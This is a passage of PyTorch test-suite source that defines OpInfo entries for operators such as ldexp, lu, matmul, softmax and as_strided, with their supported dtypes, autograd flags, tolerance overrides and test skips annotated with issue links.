torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 1e-1}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.cfloat, torch.cdouble]), ), # log2(z)->-inf for |z|->0 reference_numerics_filter=NumericsFilter(condition=lambda x: torch.abs(x) < 0.1, safe_val=1)), BinaryUfuncInfo('ldexp', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_inplace_autograd=False, promotes_int_to_float=True, supports_out=True, supports_rhs_python_scalar=False, skips=( # RuntimeError: mul(): functions with out=... arguments don't support # automatic differentiation, but one of the arguments requires grad # https://github.com/pytorch/pytorch/issues/68966 DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_variant_consistency_eager'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), ), decorators=[ DecorateInfo( toleranceOverride({ torch.complex64: tol(atol=1e-05, rtol=1e-05) }), 'TestCommon', device_type='cpu', ), ], ), OpInfo('logaddexp', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.bfloat16), dtypesIfROCM=floating_types_and(torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=lambda op_info, device, dtype, requires_grad=False, **kwargs: (SampleInput(make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), args=(make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad),)),)), OpInfo('logaddexp2', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.bfloat16), dtypesIfROCM=floating_types_and(torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=lambda op_info, device, dtype, requires_grad=False, **kwargs: (SampleInput(make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), args=(make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad),)),)), UnaryUfuncInfo('logical_not', ref=np.logical_not, decorators=(precisionOverride({torch.bfloat16: 7e-1, torch.float16: 5e-1}),), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_autograd=False, skips=( # The function variant always returns BoolTensor # while the inplace variant preserves the input dtype. # >>> t = torch.randn(3) # >>> torch.logical_not(t) # tensor([False, False, False]) # >>> torch.logical_not(t).dtype # torch.bool # >>> t.logical_not_().dtype # torch.float32 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_variant_consistency', dtypes=all_types_and_complex_and(torch.half, torch.bfloat16)), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', dtypes=all_types_and_complex_and(torch.half, torch.bfloat16)), )), BinaryUfuncInfo('lt', ref=np.less, aliases=('less',), dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), always_returns_bool=True, supports_autograd=False,), OpInfo('linalg.lu_factor', aten_name='linalg_lu_factor', op=torch.linalg.lu_factor, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_lu, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack]), OpInfo('linalg.lu_factor_ex', aten_name='linalg_lu_factor_ex', op=torch.linalg.lu_factor_ex, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_lu, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack]), OpInfo('linalg.lu', aten_name='linalg_lu', op=torch.linalg.lu, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_lu, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack]), OpInfo('lu_unpack', op=torch.lu_unpack, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=(skipCPUIfNoLapack,), sample_inputs_func=sample_inputs_lu_unpack), OpInfo('lu', op=torch.lu, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_lu, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # we skip jit tests because `lu` is a torch function # RuntimeError: # 'Tensor (inferred)' object has no attribute or method 'lu'.: # File "<string>", line 3 # def the_method(i0): # return i0.lu(True, True) # ~~~~~ <--- HERE DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # RuntimeError not raised: Expected RuntimeError when calling with input.device=cpu and out.device=cuda DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # UserWarning not triggered : Resized a non-empty tensor but did not warn about it. DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), )), OpInfo('lu_solve', op=torch.lu_solve, dtypes=floating_and_complex_types(), check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # See https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_lu_solve, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Tests different backward implementations"), "TestCommon", "test_floating_inputs_are_differentiable"),), ), OpInfo('masked_fill', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), sample_inputs_func=sample_inputs_masked_fill, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, supports_out=False), OpInfo('masked_scatter', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_masked_scatter, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, supports_out=False), OpInfo('masked_select', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_masked_select, error_inputs_func=error_inputs_masked_select), OpInfo('matrix_exp', dtypes=floating_and_complex_types_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), aliases=('linalg.matrix_exp',), sample_inputs_func=sample_inputs_matrix_exp, # Needs to construct a 2nx2n matrix by copy_ ing into it check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), # times out DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), ), supports_out=False, ), OpInfo('matmul', aliases=('linalg.matmul',), dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (SM53OrLater and CUDA11OrLater) or TEST_WITH_ROCM else []), assert_autodiffed=True, assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, sample_inputs_func=sample_inputs_matmul, decorators=[ # NVIDIA only assures that bfloat16 is supported by bmm if SM >= 5.3 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes', device_type='cuda', active_if=not SM53OrLater), # ROCm intermittently fails the test with standard atol/rtol DecorateInfo(toleranceOverride({torch.float32: tol(atol=1e-4, rtol=0)}), 'TestCommon', 'test_noncontiguous_samples', device_type='cuda', active_if=TEST_WITH_ROCM), DecorateInfo(toleranceOverride({torch.float32: tol(atol=1e-4, rtol=0)}), 'TestCommon', 'test_out', device_type='cuda', active_if=TEST_WITH_ROCM), # mv for the sample with shapes (S, S, M, M), (M,) has some variance in the # backward on CPU DecorateInfo(toleranceOverride({torch.float32: tol(atol=0, rtol=1e-5)}), 'TestCommon', 'test_noncontiguous_samples', device_type='cpu'), ], skips=( # https://github.com/pytorch/pytorch/issues/67470 DecorateInfo(unittest.skip("67470!"), 'TestCommon', 'test_noncontiguous_samples', device_type='cpu', dtypes=(torch.long,)), # AssertionError: False is not true : Tensors failed to compare as equal! DecorateInfo(unittest.skip("Skipped!"), 'TestOpInfo', device_type='xla', dtypes=(torch.long,)), # https://github.com/pytorch/pytorch/issues/71774 DecorateInfo(unittest.skip('Skipped!'), 'TestNNCOpInfo', 'test_nnc_correctness', device_type='cpu', dtypes=(torch.long,)), )), OpInfo('max', variant_test_name='reduction_with_dim', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), sample_inputs_func=sample_inputs_max_min_reduction_with_dim, supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('max', variant_test_name='reduction_no_dim', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_max_min_reduction_no_dim), OpInfo('median', dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16), # TODO: some signatures of median do support out supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=partial(sample_inputs_reduction, supports_multiple_dims=False)), OpInfo('nanmedian', dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16), # TODO: some signatures of nanmedian do support out supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=partial(sample_inputs_reduction, supports_multiple_dims=False)), OpInfo('var_mean', dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_reduction, supports_multiple_dims=False), backward_dtypes=floating_types_and(torch.half, torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.half), # TODO: some signatures of var_mean do support out supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=False, # Need: var_mean skips=( # var_mean does not support automatic differentiation for outputs with complex dtype DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), # https://github.com/pytorch/pytorch/issues/67539 DecorateInfo(unittest.skip("67539"), 'TestCommon', 'test_noncontiguous_samples', active_if=TEST_WITH_ASAN, device_type='cpu'), # TODO: FIXME: complex inputs requiring grad error in forward DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes'), # TODO: review with var_mean tests in test_autograd.py DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip("Fails on ASAN!"), 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD'), # Division by zero, may be related to above? DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_fwgrad_bwgrad'))), OpInfo('std_mean', dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_reduction, supports_multiple_dims=False), backward_dtypes=floating_types_and(torch.half, torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.half), # TODO: some signatures of std_mean do support out supports_out=False, supports_forward_ad=True, # Supports only certain variants? supports_fwgrad_bwgrad=False, # Need: std_mean skips=( DecorateInfo(unittest.skip("ASAN: division by zero!"), active_if=TEST_WITH_ASAN), # std_mean does not support forward when complex inputs require grad DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), # https://github.com/pytorch/pytorch/issues/67539 DecorateInfo(unittest.skip("67539"), 'TestCommon', 'test_noncontiguous_samples', active_if=TEST_WITH_ASAN, device_type='cpu'), # TODO: fix along with var_mean autograd tests DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip("Fails on ASAN!"), 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD'), # Division by zero, may be related to above? DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_fwgrad_bwgrad'))), OpInfo('meshgrid', variant_test_name='variadic_tensors', ref=np.meshgrid, dtypes=all_types_and_complex_and(torch.bfloat16, torch.bool, torch.float16), sample_inputs_func=partial(sample_inputs_meshgrid, variant='variadic'), skips=[ # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":252, # please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # meshgrid is defined in torch.functional to take a # variadic list of tensors. Variadic parameters are not # compatible with the normalize operator tests. DecorateInfo(unittest.skip("Skipped!"), 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # Skip operator schema test because this is a functional and not an operator DecorateInfo(unittest.skip("Skipped!"), 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ], supports_out=False, supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('meshgrid', variant_test_name='list_of_tensors', # Unlike the variant above, we do not use np.meshgrid as a # ref since it does not officially support list of numpy # arrays. dtypes=all_types_and_complex_and(torch.bfloat16, torch.bool, torch.float16), sample_inputs_func=partial(sample_inputs_meshgrid, variant='list'), skips=[ # meshgrid is defined in torch.functional to take a # variadic list of tensors. Variadic parameters are not # compatible with the normalize operator tests. DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), ], assert_autodiffed=True, supports_out=False, autodiff_nonfusible_nodes=[], supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('min', variant_test_name='reduction_with_dim', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), sample_inputs_func=sample_inputs_max_min_reduction_with_dim, supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('min', variant_test_name='reduction_no_dim', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_max_min_reduction_no_dim), OpInfo('quantile', dtypes=floating_types(), sample_inputs_func=sample_inputs_reduction_quantile, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), ), # See https://github.com/pytorch/pytorch/issues/66357 # Relies on copy_ to broadcast, but the forward AD path calls broadcast_to which # does not have a batching rule in core check_batched_forward_grad=False), OpInfo('nanquantile', dtypes=floating_types(), sample_inputs_func=sample_inputs_reduction_quantile, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), ), # See https://github.com/pytorch/pytorch/issues/66357 # Relies on copy_ to broadcast, but the forward AD path calls broadcast_to which # does not have a batching rule in core check_batched_forward_grad=False), BinaryUfuncInfo( 'max', aliases=('maximum',), variant_test_name='binary', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, ref=np.maximum, supports_rhs_python_scalar=False, skips=( # Incorrectly attempts to use a scalar for the second argument DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), # TODO: FIXME: RuntimeError: "max_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo( 'maximum', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, ref=np.maximum, supports_rhs_python_scalar=False, skips=( # TODO: FIXME: RuntimeError: "max_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo( 'min', aliases=('minimum',), variant_test_name='binary', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, ref=np.minimum, supports_rhs_python_scalar=False, skips=( # Incorrectly attempts to use a scalar for the second argument DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), # TODO: FIXME: RuntimeError: "min_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo( 'minimum', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, ref=np.minimum, supports_rhs_python_scalar=False, skips=( # TODO: FIXME: RuntimeError: "min_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), ), ), BinaryUfuncInfo('logical_and', ref=np.logical_and, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_autograd=False, always_returns_bool=True, supports_rhs_python_scalar=False), BinaryUfuncInfo('logical_or', ref=np.logical_or, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_autograd=False, always_returns_bool=True, supports_rhs_python_scalar=False), BinaryUfuncInfo('logical_xor', ref=np.logical_xor, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_autograd=False, always_returns_bool=True, supports_rhs_python_scalar=False), BinaryUfuncInfo('bitwise_and', ref=np.bitwise_and, dtypes=integral_types_and(torch.bool), operator_variant=operator.and_, inplace_operator_variant=operator.iand, supports_autograd=False, supports_one_python_scalar=True, skips=( # RuntimeError: "bitwise_and_cuda" not implemented for 'Half' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo('bitwise_or', ref=np.bitwise_or, dtypes=integral_types_and(torch.bool), operator_variant=operator.or_, inplace_operator_variant=operator.ior, supports_autograd=False, supports_one_python_scalar=True, skips=( # TODO: FIXME: RuntimeError: "bitwise_or_cuda" not implemented for 'Half' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo('bitwise_xor', ref=np.bitwise_xor, dtypes=integral_types_and(torch.bool), operator_variant=operator.xor, inplace_operator_variant=operator.ixor, supports_autograd=False, supports_one_python_scalar=True, skips=( # TODO: FIXME: RuntimeError: "bitwise_xor_cuda" not implemented for 'Half' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo('heaviside', ref=lambda a, b: ( # necessary because np.heaviside incorrectly returns float64 when passed args of dtype int64 np.int64(np.heaviside(a, b)) if a.dtype == np.int64 and b.dtype == np.int64 else np.heaviside(a, b) ), dtypes=all_types_and(torch.bool, torch.float16, torch.bfloat16), supports_autograd=False, supports_rhs_python_scalar=False, skips=( # RuntimeError: heaviside is not yet implemented for tensors with different dtypes. DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), # PyTorch's heaviside does not appear to propagate NaNs DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_extremal_values'), )), BinaryUfuncInfo('lcm', ref=np.lcm, dtypes=integral_types_and(), supports_autograd=False, supports_rhs_python_scalar=False), BinaryUfuncInfo('gcd', ref=np.gcd, dtypes=integral_types_and(), supports_autograd=False, supports_rhs_python_scalar=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.int8,)),)), BinaryUfuncInfo('isclose', ref=np.isclose, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_isclose, supports_autograd=False, supports_out=False, supports_rhs_python_scalar=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_numpy_refs', dtypes=(torch.complex128,)), # RuntimeError: Short did not match Int DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_extremal_values'), # Problem due to internal inplace operations DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), )), # `softmax` supports different dtypes based on whether `dtype` argument, # is passed or not. Hence two OpInfo entries, one with dtype and other without. # https://github.com/pytorch/pytorch/issues/68752 OpInfo('softmax', aliases=('special.softmax', 'nn.functional.softmax',), aten_name='softmax', aten_backward_name='_softmax_backward_data', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_softmax_variant, assert_jit_shape_analysis=True, assert_autodiffed=True, supports_forward_ad=True, supports_out=True), OpInfo('softmax', aliases=('special.softmax', 'nn.functional.softmax',), variant_test_name="with_dtype", aten_name='softmax', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=partial(sample_inputs_softmax_variant, with_dtype=True), assert_autodiffed=True, supports_forward_ad=True, supports_out=True), # `softmin` supports different dtypes based on whether `dtype` argument, # is passed or not. Hence two OpInfo entries, one with dtype and other without. # https://github.com/pytorch/pytorch/issues/68752 OpInfo('nn.functional.softmin', aten_name='softmin', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_softmax_variant, assert_jit_shape_analysis=False, assert_autodiffed=False, supports_forward_ad=True, supports_out=False), OpInfo('nn.functional.softmin', variant_test_name="with_dtype", aten_name='softmin', dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), sample_inputs_func=partial(sample_inputs_softmax_variant, with_dtype=True), assert_autodiffed=False, supports_forward_ad=True, supports_out=False), OpInfo( "nn.functional.cross_entropy", dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_cross_entropy, supports_out=False, supports_forward_ad=True, decorators=( DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-5, rtol=1e-3)}), "TestJit", "test_variant_consistency_jit", device_type="cpu", ), ), skips=( # AssertionError: False is not true : Scalars failed to compare as equal! 0 != 1536 # test_ops.TestJitCUDA.test_variant_consistency_jit_nn_functional_cross_entropy_cuda_float32 leaked # 1536 bytes CUDA memory on device 0 DecorateInfo( unittest.expectedFailure, "TestJit", "test_variant_consistency_jit", device_type="cuda", ), ) ), OpInfo('nn.functional.normalize', dtypes=floating_and_complex_types_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_normalize, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), )), OpInfo('aminmax', ref=lambda x, dim=None, keepdim=False: (np.amin(x, axis=dim, keepdims=keepdim), np.amax(x, axis=dim, keepdims=keepdim)), dtypes=all_types_and(torch.bool), dtypesIfCUDA=all_types_and(torch.bool, torch.float16, torch.bfloat16), decorators=(onlyNativeDeviceTypes,), supports_autograd=False, sample_inputs_func=sample_inputs_aminmax, error_inputs_func=error_inputs_aminmax_amax_amin, skips=( # AssertionError: Resizing an out= argument with no elements threw a resize warning! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out', device_type='cpu'), )), OpInfo('as_strided', op=lambda x, size, stride, storage_offset=0: torch.as_strided(x, size, stride, storage_offset=storage_offset), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, sample_inputs_func=sample_inputs_as_strided, skips=( # Note: This xfail is fine -- it's inherent to how as_strided works DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_noncontiguous_samples'), # AssertionError: False is not true : Scalars failed to compare as equal! DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestCommon', 'test_variant_consistency_eager'), # RuntimeError: This operator is not Composite Compliant DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestCompositeCompliance', 'test_forward_ad'), # Not close DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestCommon', 'test_complex_half_reference_testing'), # Not close DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.skip("Numerous errors"), 'TestGradients'))), OpInfo('as_strided_scatter', op=lambda x, src, size, stride, storage_offset=0: torch.as_strided_scatter(x, src, size, stride, storage_offset=storage_offset), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, sample_inputs_func=sample_inputs_as_strided_scatter, skips=( DecorateInfo(unittest.skip('Works only for CPU complex64'), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip('Works for float64, fails for everything else'), 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.skip('Works for int64, fails for everything else'), 'TestCommon', 'test_noncontiguous_samples'), # noqa: B950 DecorateInfo(unittest.skip('Fails in most cases, passes on LAZY for some reason'), 'TestCommon', 'test_variant_consistency_eager'), # noqa: B950 DecorateInfo(unittest.skip('Only fails for LAZY, passes on everything else'), 'TestCompositeCompliance', 'test_backward'), # noqa: B950 DecorateInfo(unittest.skip('Passes on complex64 and float32 only'), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip('Fails on cuda + rocm'), 'TestCommon', 'test_complex_half_reference_testing'), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_grad'), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip('Passes on complex128 and float64 only'), 'TestGradients', 'test_fn_fwgrad_bwgrad'),)), OpInfo('nn.functional.cosine_similarity', aten_name="cosine_similarity", dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_cosine_similarity), OpInfo('nn.functional.adaptive_avg_pool1d', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_avg_pool1d), OpInfo('nn.functional.adaptive_avg_pool2d', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), decorators=( # RuntimeError: # adaptive_avg_pool2d(Tensor input, int[2] output_size) -> (Tensor): # Expected a value of type 'List[int]' for argument 'output_size' but # instead found type 'Tuple[NoneType, int]'. : # File "<string>", line 3 # def the_method(i0): # return torch.nn.functional.adaptive_avg_pool2d(i0, (None, 7)) # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <--- HERE DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_avg_pool2d), OpInfo('nn.functional.adaptive_avg_pool3d', dtypes=floating_types_and(torch.half), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), decorators=( # RuntimeError: # adaptive_avg_pool3d(Tensor input, int[3] output_size) -> (Tensor): # Expected a value of type 'List[int]' for argument 'output_size' but # instead found type 'Tuple[NoneType, NoneType, NoneType]'. : # File "<string>", line 3 # # def the_method(i0): # return torch.nn.functional.adaptive_avg_pool3d(i0, (None, None, None)) # 